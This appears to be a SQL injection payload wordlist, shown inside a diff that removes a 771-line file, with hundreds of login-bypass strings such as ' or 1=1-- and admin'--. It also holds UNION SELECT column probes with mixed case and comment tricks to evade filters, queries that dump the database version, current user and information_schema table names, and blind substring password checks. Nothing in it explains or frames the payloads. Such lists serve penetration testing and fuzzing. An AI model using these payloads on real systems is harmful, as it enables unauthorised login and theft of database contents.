"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
